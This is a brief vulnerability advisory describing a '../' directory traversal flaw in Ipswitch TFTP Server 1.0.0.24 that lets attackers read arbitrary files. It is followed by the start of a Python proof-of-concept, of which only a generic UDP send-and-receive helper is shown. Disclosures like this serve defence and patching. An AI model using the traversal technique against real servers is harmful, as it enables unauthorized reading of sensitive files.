Vulnerable Systems:
* Ipswitch TFTP Server 1.0.0.24
The vulnerability is caused due to improper validation to Read Request containing '../' sequences, which allows attackers to read arbitrary
files.
Successful exploitation could allow an attacker to obtain sensitive information.
POC :
import sys, socket
def sendPacket(HOST, PORT, data):
'''
Sends UDP Data to a Particular Host on a Specified Port
with a Given Data and Return the Response
'''
udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp_sock.sendto(data, (HOST, PORT))
data = udp_sock.recv(1024)
udp_sock.close()
return data